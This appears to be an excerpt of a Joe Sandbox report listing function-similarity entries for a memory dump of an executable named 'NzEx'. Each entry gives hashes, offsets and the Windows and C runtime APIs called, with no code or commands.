                                                      • Instruction ID: 8599ccd6df81bc48db5aebb325244a5af8b62fbfa448b0800e3fd4222580427d
                                                      • Opcode Fuzzy Hash: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                      • Instruction Fuzzy Hash: D341E73AE05247A2FB54AB18D642278B3E0FF45758F840270DA4E877D0CF6AF452E760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                      • Instruction ID: a480688ffc453240d7efaf2def84cf11f808a9b9b3af4cfea1977ede38220011
                                                      • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                      • Instruction Fuzzy Hash: F1314D3AA08A47A5F7017B65C84237CE691AF84BA5FD102B5EA2D033D2CE7DE441A631
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                      • Instruction ID: 260b2995b9d129ab881615939362b08cbb5279339c6036e970d758fb2f17bdd2
                                                      • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                      • Instruction Fuzzy Hash: BC21D336A08A4396F760BF29D441779B3A0EB84B94F980234E75D476D5DF3CD4009B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                      • String ID:
                                                      • API String ID: 3947729631-0
                                                      • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                      • Instruction ID: 6c4a6086e7e82cbb616b3b05a2d42270c71ebe7fe75031cb7f134a76a7e34a1b
                                                      • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                      • Instruction Fuzzy Hash: 5121793AE05B46DAFB21BF74C4422EC77A1EB44708F944A7AD64C02B85DF38D584DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                      • Instruction ID: 01004a19a4fbe6c2d3101e2865dbcf06bec122edbb8b39b42545c9e19abe29e9
                                                      • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                      • Instruction Fuzzy Hash: 1411A22EA0C58BA1FF52FA1594023FDE650AF45B84FD485B0EE6C47AC6CF2DE540A721
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                      • Instruction ID: 9fb10b66317c6d1a0cf661e42f22445756be29f31763d91986810a8e1d744b25
                                                      • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                      • Instruction Fuzzy Hash: E001A169A0878750FA14FB5398020B9E691FF85FE0F8846B1EE6C57BD6CE3CD4429310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                      • Instruction ID: 46b5b60f4271260b1faf7c837b3e6d51ace93c7802e7b9ed1a2994cac5b80862
                                                      • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                      • Instruction Fuzzy Hash: 481167AAD09A47A6FB44AF64D0422ACF760EF80764FD04272E65D022D5CA7DE001AB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                      • Instruction ID: 21d139198e7eecb9e4c303d51aa568e9bb3cf14b63a6b5db74b1b0b43ba65d9d
                                                      • Opcode Fuzzy Hash: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                      • Instruction Fuzzy Hash: D801DF6DE0A54B61FF547A7A985337C92409F41778FA403B0E92D8B2C2CE2CE401B260
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF73AF3AB79,?,?,?,00007FF73AF2AF01,?,?,?,?,00007FF73AF402A3), ref: 00007FF73AF39271
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                      • Instruction ID: f51146e948632442e26633cc21137873acc62cc3a763f17d7b9ea9d3684f7241
                                                      • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                      • Instruction Fuzzy Hash: 4DF0625CF0DA03A1FF5476A554A33B8E2945F89B80FCC81B4CD0E966D6DD2DE4816230
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _fread_nolock_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2335118202-0
                                                      • Opcode ID: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                      • Instruction ID: e2a5962b6b08ea9450478e9a18343b1f6df3696de2fe4cc4666ac5d75b267bbd
                                                      • Opcode Fuzzy Hash: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                      • Instruction Fuzzy Hash: C5011A36A08B4991EB20EB55E48271EB7A4FBC8BC8F904521EECD47B69DF7DC1508B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                      • Instruction ID: c618806f26707e514b247fc3900db3a56981c04b9d4993a9a462ce2f10882195
                                                      • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                      • Instruction Fuzzy Hash: 26F0BE2DA0D94B61FA04BB6AA4031BDE2809F45390FE403B0F66D462C3CE2CE442A370
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID:
                                                      • API String ID: 1964310414-0
                                                      • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                      • Instruction ID: 2970caf84cbd52d4e069f6a924bb998488d496f08e26cc603e7b29e5cdb5647f
                                                      • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                      • Instruction Fuzzy Hash: 3B018C26204E84C5EB05AF3AC4524ACB7B4FB08F8DB085261DF885732CEF35D145C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF73AEBAF20,?,?,?,?,00007FF73AEBAABE), ref: 00007FF73AEBAE07
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                      • Instruction ID: 212e6b61ac06419e0209ebbf0ed138c66c5ad6cd687ded08bed157998b21522e
                                                      • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                      • Instruction Fuzzy Hash: 1EE0C97661C68197E720EF15E44521AFBB0F784788F900665EACC43A18CB7DD6549F44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                      • Instruction ID: cc19c55da2e28a24d2ced10e41e4f1f1670045d6bd23be60b0cefd6bd74ec3c4
                                                      • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                      • Instruction Fuzzy Hash: FEF0B276A08B8582EB20EB05F44631AFBA4F7D5788F500625EACC03B68CF7DD6559B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                      • Instruction ID: be703068668745205ab71540ab4981d6f08df3cb646413d8244b18bfdf4b5a2d
                                                      • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                      • Instruction Fuzzy Hash: 0AD0C971A18F8181D744EB16F88510AB7A4FBD5780F908425EAC942A28DF3CC2A98F40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00007FF73AF3A9A0: GetLastError.KERNEL32(?,?,?,00007FF73AF3CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3), ref: 00007FF73AF3A9AF
                                                        • Part of subcall function 00007FF73AF3A9A0: SetLastError.KERNEL32(?,?,?,00007FF73AF3CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3), ref: 00007FF73AF3AA4D
                                                      • TranslateName.LIBCMT ref: 00007FF73AF4A0A9
                                                      • TranslateName.LIBCMT ref: 00007FF73AF4A0E4
                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF73AF3717C), ref: 00007FF73AF4A129
                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF73AF3717C), ref: 00007FF73AF4A151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                      • String ID: utf8
                                                      • API String ID: 2136749100-905460609
                                                      • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction ID: 108ca78dada77e88bf03ccff8b09028e787c4413f1196af397093f1811f353cd
                                                      • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction Fuzzy Hash: 4A91AF3AA09763A1FB24BF21D443AB9A3A4EF84B80F844271DA4D47785DF3DE551E720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                      • String ID:
                                                      • API String ID: 3939093798-0
                                                      • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction ID: 915fcef3ff0f0dfc461e6c94de27d52302126e58e288fcb956178f046a54d56f
                                                      • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction Fuzzy Hash: F271912AF08623A6FB50BB60D453AB9B3A1BF44744FC44275CA5D43695EF3CE445E360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction ID: e4f10630c618279c25c5af97e5d37faf6bb36aa7b24e17815429cd90937b3fa5
                                                      • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction Fuzzy Hash: 82315076609B8295FB60EF60E8413EDB3A4FB44744F84447ADA4E47A98EF3CD648C724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 435049134-0
                                                      • Opcode ID: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                      • Instruction ID: 22047060323dbcbab1e5769cf51c38e10e11cacde32a4c89aaefa356c7dab784
                                                      • Opcode Fuzzy Hash: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                      • Instruction Fuzzy Hash: 95B1032AF18663A1F728FF22D8429B9E360BF94784F804175EE4C47A95DF3DE441A760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1405656091-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID:
                                                      • API String ID: 3764944385-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                      • String ID:
                                                      • API String ID: 1443284424-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _get_daylight.LIBCMT ref: 00007FF73AF42CA2
                                                        • Part of subcall function 00007FF73AF423E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF423F4
                                                      • _get_daylight.LIBCMT ref: 00007FF73AF42CB3
                                                        • Part of subcall function 00007FF73AF42380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF42394
                                                      • _get_daylight.LIBCMT ref: 00007FF73AF42CC4
                                                        • Part of subcall function 00007FF73AF423B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF423C4
                                                        • Part of subcall function 00007FF73AF39294: HeapFree.KERNEL32(?,?,?,00007FF73AF48C78,?,?,?,00007FF73AF48FFB,?,?,00000019,00007FF73AF496D0,?,?,?,00007FF73AF49603), ref: 00007FF73AF392AA
